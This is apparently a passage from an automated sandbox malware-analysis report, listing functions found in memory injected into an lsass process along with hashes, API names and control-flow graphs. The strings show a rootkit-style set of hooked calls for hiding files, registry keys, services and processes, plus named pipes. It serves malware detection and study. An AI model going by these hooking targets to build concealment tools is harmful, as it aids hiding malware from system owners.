                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: bf2ef32ac57e5f465ce725a7a74baab9ea04f71ed1d086599ba6561ce8fa9f42
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: 2AB19E72250B5486EB668F2BD4407E9A3A5FB48BA4F645066EF4D53BB5DF34CC40C382
                                                                          Function 00000140AE86D2A4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID: F]:82
                                                                          • API String ID: 1239891234-2422748741
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: f4b3617ef55b8c279f228a1357564ad9138b4f9cc27f1e8a361b5862f6d2fb0c
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 9C314E32654B8086EB619F26E8403DE73A4F789764F600125EF9D47BB8EF38C945CB81
                                                                          Function 00000140AE867D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 1503c4d1f0e9a2face0525283fdd9087e61cbfeab21d2c89dc1035b309a16709
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 2131A372245B808AEB618F61E8407ED7361F788754F64442ADF4D47BA8EF38C948C790
                                                                          Function 00000140AE8612BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: eaf29793312f880262aa33c4d225e9377ef8ac7c3781aeeffa93a87445d713dc
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: B5516C32640B8486EB56CF62E54839AB7A1F78DBA9F244124DF4D07B29DF3CC445C791
                                                                          Function 00000140AE861D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 2267be31c3c8b37de2fa04f2787d19f37c5545ab8d6e24567a23a1f44e334d39
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 3531A574580B4AA0EA07EB6BE8516E47321BB5D3B4FF05413AE0D131B69F788E49C3D2
                                                                          Function 00000140ADFC6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 326 140adfc6910-140adfc6916 327 140adfc6918-140adfc691b 326->327 328 140adfc6951-140adfc695b 326->328 329 140adfc691d-140adfc6920 327->329 330 140adfc6945-140adfc6984 call 140adfc6fc0 327->330 331 140adfc6a78-140adfc6a8d 328->331 332 140adfc6938 __scrt_dllmain_crt_thread_attach 329->332 333 140adfc6922-140adfc6925 329->333 349 140adfc698a-140adfc699f call 140adfc6e54 330->349 350 140adfc6a52 330->350 334 140adfc6a9c-140adfc6ab6 call 140adfc6e54 331->334 335 140adfc6a8f 331->335 341 140adfc693d-140adfc6944 332->341 337 140adfc6927-140adfc6930 333->337 338 140adfc6931-140adfc6936 call 140adfc6f04 333->338 347 140adfc6aef-140adfc6b20 call 140adfc7190 334->347 348 140adfc6ab8-140adfc6aed call 140adfc6f7c call 140adfc6e1c call 140adfc7318 call 140adfc7130 call 140adfc7154 call 140adfc6fac 334->348 339 140adfc6a91-140adfc6a9b 335->339 338->341 360 140adfc6b31-140adfc6b37 347->360 361 140adfc6b22-140adfc6b28 347->361 348->339 358 140adfc6a6a-140adfc6a77 call 140adfc7190 349->358 359 140adfc69a5-140adfc69b6 call 140adfc6ec4 349->359 354 140adfc6a54-140adfc6a69 350->354 358->331 376 140adfc69b8-140adfc69dc call 140adfc72dc call 140adfc6e0c call 140adfc6e38 call 140adfcac0c 359->376 377 140adfc6a07-140adfc6a11 call 140adfc7130 359->377 366 140adfc6b7e-140adfc6b94 call 140adfc268c 360->366 367 140adfc6b39-140adfc6b43 360->367 361->360 365 140adfc6b2a-140adfc6b2c 361->365 372 140adfc6c1f-140adfc6c2c 365->372 387 140adfc6bcc-140adfc6bce 366->387 388 140adfc6b96-140adfc6b98 366->388 373 140adfc6b4f-140adfc6b5d call 140adfd5780 367->373 374 140adfc6b45-140adfc6b4d 367->374 379 140adfc6b63-140adfc6b78 call 140adfc6910 373->379 391 140adfc6c15-140adfc6c1d 373->391 374->379 376->377 429 140adfc69de-140adfc69e5 __scrt_dllmain_after_initialize_c 376->429 377->350 399 140adfc6a13-140adfc6a1f call 140adfc7180 377->399 379->366 379->391 389 140adfc6bd5-140adfc6bea call 140adfc6910 387->389 390 140adfc6bd0-140adfc6bd3 387->390 388->387 396 140adfc6b9a-140adfc6bbc call 140adfc268c call 140adfc6a78 388->396 389->391 408 140adfc6bec-140adfc6bf6 389->408 390->389 390->391 391->372 396->387 423 140adfc6bbe-140adfc6bc6 call 140adfd5780 396->423 416 140adfc6a45-140adfc6a50 399->416 417 140adfc6a21-140adfc6a2b call 140adfc7098 399->417 413 140adfc6bf8-140adfc6bff 408->413 414 140adfc6c01-140adfc6c11 call 140adfd5780 408->414 413->391 414->391 416->354 417->416 428 140adfc6a2d-140adfc6a3b 417->428 423->387 428->416 429->377 430 140adfc69e7-140adfc6a04 call 140adfcabc8 429->430 430->377
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 79a856343edf9d6588f3d0cd2b4f253cfe509a1624521d714eea0eda72951458
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: FC81E23162834987F656AB6798403DB72A3EF8D784F3440259B69477B6DB38C867B300
                                                                          Function 00000140AE86CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000140AE86CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEBC
                                                                          • SetLastError.KERNEL32 ref: 00000140AE86CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000140AE86ECCC,?,?,?,?,00000140AE86BF9F,?,?,?,?,?,00000140AE867AB0), ref: 00000140AE86CF2C
                                                                            • Part of subcall function 00000140AE86D6CC: HeapAlloc.KERNEL32 ref: 00000140AE86D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF54
                                                                            • Part of subcall function 00000140AE86D744: HeapFree.KERNEL32 ref: 00000140AE86D75A
                                                                            • Part of subcall function 00000140AE86D744: GetLastError.KERNEL32 ref: 00000140AE86D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: b2b40885048b18a77dd749f130d094d7928ae544b3603784d23cb63539606b23
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 0941183028174441FA6BAB6799553E922926B5C7B0F744B24AF3E4B6F6DE789C01C2C3
                                                                          Function 00000140AE86A544 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 484 140ae86a544-140ae86a5ac call 140ae86b414 487 140ae86a5b2-140ae86a5b5 484->487 488 140ae86aa13-140ae86aa1b call 140ae86c748 484->488 487->488 489 140ae86a5bb-140ae86a5c1 487->489 491 140ae86a5c7-140ae86a5cb 489->491 492 140ae86a690-140ae86a6a2 489->492 491->492 496 140ae86a5d1-140ae86a5dc 491->496 494 140ae86a963-140ae86a967 492->494 495 140ae86a6a8-140ae86a6ac 492->495 497 140ae86a9a0-140ae86a9aa call 140ae869634 494->497 498 140ae86a969-140ae86a970 494->498 495->494 499 140ae86a6b2-140ae86a6bd 495->499 496->492 500 140ae86a5e2-140ae86a5e7 496->500 497->488 510 140ae86a9ac-140ae86a9cb call 140ae867940 497->510 498->488 501 140ae86a976-140ae86a99b call 140ae86aa1c 498->501 499->494 503 140ae86a6c3-140ae86a6ca 499->503 500->492 504 140ae86a5ed-140ae86a5f7 call 140ae869634 500->504 501->497 507 140ae86a894-140ae86a8a0 503->507 508 140ae86a6d0-140ae86a707 call 140ae869a10 503->508 504->510 518 140ae86a5fd-140ae86a628 call 140ae869634 * 2 call 140ae869d24 504->518 507->497 511 140ae86a8a6-140ae86a8aa 507->511 508->507 523 140ae86a70d-140ae86a715 508->523 515 140ae86a8ac-140ae86a8b8 call 140ae869ce4 511->515 516 140ae86a8ba-140ae86a8c2 511->516 515->516 532 140ae86a8db-140ae86a8e3 515->532 516->497 522 140ae86a8c8-140ae86a8d5 call 140ae8698b4 516->522 552 140ae86a62a-140ae86a62e 518->552 553 140ae86a648-140ae86a652 call 140ae869634 518->553 522->497 522->532 524 140ae86a719-140ae86a74b 523->524 529 140ae86a887-140ae86a88e 524->529 530 140ae86a751-140ae86a75c 524->530 529->507 529->524 530->529 533 140ae86a762-140ae86a77b 530->533 534 140ae86a9f6-140ae86aa12 call 140ae869634 * 2 call 140ae86c6a8 532->534 535 140ae86a8e9-140ae86a8ed 532->535 537 140ae86a874-140ae86a879 533->537 538 140ae86a781-140ae86a7c6 call 140ae869cf8 * 2 533->538 534->488 539 140ae86a900 535->539 540 140ae86a8ef-140ae86a8fe call 140ae869ce4 535->540 543 140ae86a884 537->543 565 140ae86a804-140ae86a80a 538->565 566 140ae86a7c8-140ae86a7ee call 140ae869cf8 call 140ae86ac38 538->566 548 140ae86a903-140ae86a90d call 140ae86b4ac 539->548 540->548 543->529 548->497 563 140ae86a913-140ae86a961 call 140ae869944 call 140ae869b50 548->563 552->553 557 140ae86a630-140ae86a63b 552->557 553->492 569 140ae86a654-140ae86a674 call 140ae869634 * 2 call 140ae86b4ac 553->569 557->553 562 140ae86a63d-140ae86a642 557->562 562->488 562->553 563->497 573 140ae86a80c-140ae86a810 565->573 574 140ae86a87b 565->574 585 140ae86a815-140ae86a872 call 140ae86a470 566->585 586 140ae86a7f0-140ae86a802 566->586 590 140ae86a676-140ae86a680 call 140ae86b59c 569->590 591 140ae86a68b 569->591 573->538 575 140ae86a880 574->575 575->543 585->575 586->565 586->566 594 140ae86a686-140ae86a9ef call 140ae8692ac call 140ae86aff4 call 140ae8694a0 590->594 595 140ae86a9f0-140ae86a9f5 call 140ae86c6a8 590->595 591->492 594->595 595->534
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: F]:82$csm$csm$csm
                                                                          • API String ID: 849930591-967428003
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: 7b4ba636362c0b5caa681dd8b7c7e919a21c7b74d1dcc59cd2284cb1c0ce2a62
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 80E1B5726447408AEB62DF66D4803DD77A0F74DBA8F200156EF9D57BA9CB38C881D782
                                                                          Function 00000140AE86F394 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: F]:82$api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-3388934289
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 54f3c5caea9a3c542447f16078fc342d6fc1075fabbd0ba72b9af9b604dcfd33
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 0A41AE32391B0082EB27CF17A9047D56391BB4DBB0F7945259E0E97BA4EE38CC45D392
                                                                          Function 00000140AE862244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: d526e0782f541ea269add2dfc30b9375b8e19e2713657146a865421fd34f2e67
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: FB213936654B40C2EB11CB26E54839A77A1F789BA4F600215EF5D03BB8CF3CC949CB41
                                                                          Function 00000140ADFC9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 610288a21bba7234f961b83c38f566fdeb512e40ac2c0f228fa86b943482e177
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 21E1AE726247488BEB62DB26D4803DE37B3FB49B89F200115EF8957BA5DB34C1A2D700
                                                                          Function 00000140AE865B30 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID: F]:82
                                                                          • API String ID: 1666949209-2422748741
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 4b8643210702c91202cb0783c5a391a2a26d50b369a2e2f855514301358eef3e
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: 98D19736248B8882DA719B0AE49439A77A0F78CB94F600516EF8D47BB5DF3CC941CB81
                                                                          Function 00000140AE86104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: f351be34048a7ac2b0398fd5e5befab81f97ba1f80314118af7c8759807b7470
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 54415B32614B84C6E761CF22E44439A77B1F389BA8F248129DF8D07B68DF38C849CB41
                                                                          Function 00000140AE86D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 5fd4451407afae9fb266b5747a94aa354b26cb0abe68d3eef0f402a98e977e8e
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: D1114C3068434441FA6AAB275A513E962516B5C7F0F785B24AE3D076FEDE78DC02C683
                                                                          Function 00000140AE867510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 65cc65eb12478eed7e59dbe5af20ea895e9a9811b6e8982f7201964f625eb0cd
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: F2819F30A9034187FB53AB6798413D92292AB8D7B4F744525AF0C477B6EB3ACC45C7C2
                                                                          Function 00000140AE86FC40 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: F]:82$F]:82$F]:82$F]:82$F]:82
                                                                          • API String ID: 3215553584-1326181600
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 8cbfef7c759d1503d62dee80ba3df973cf9f1eeee01b9a1c02a96c55a65f64a8
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: CD619E3268174082FA679F2B94443EA6AA1E78D7A0F744815DF0E077B9DB38DC41D282
                                                                          Function 00000140AE869DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 03dcf4635245ae701bcfc235362316d2ff68836874f11cf0347ec2092aff8e99
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: 9F319031292B40E1EF239B47A4007D56394B74CBB0F7985259E2E4B7A0EF7DC845C392
                                                                          Function 00000140AE873DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: ad989254367ffea67bb77bf17bba7392694ea205673c5da45a75a0c92e4d569a
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 82114932650B4086E7528B53A84439977A4B79CFF4F644224EF5E87BA5CF38C814C782
                                                                          Function 00000140AE863790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
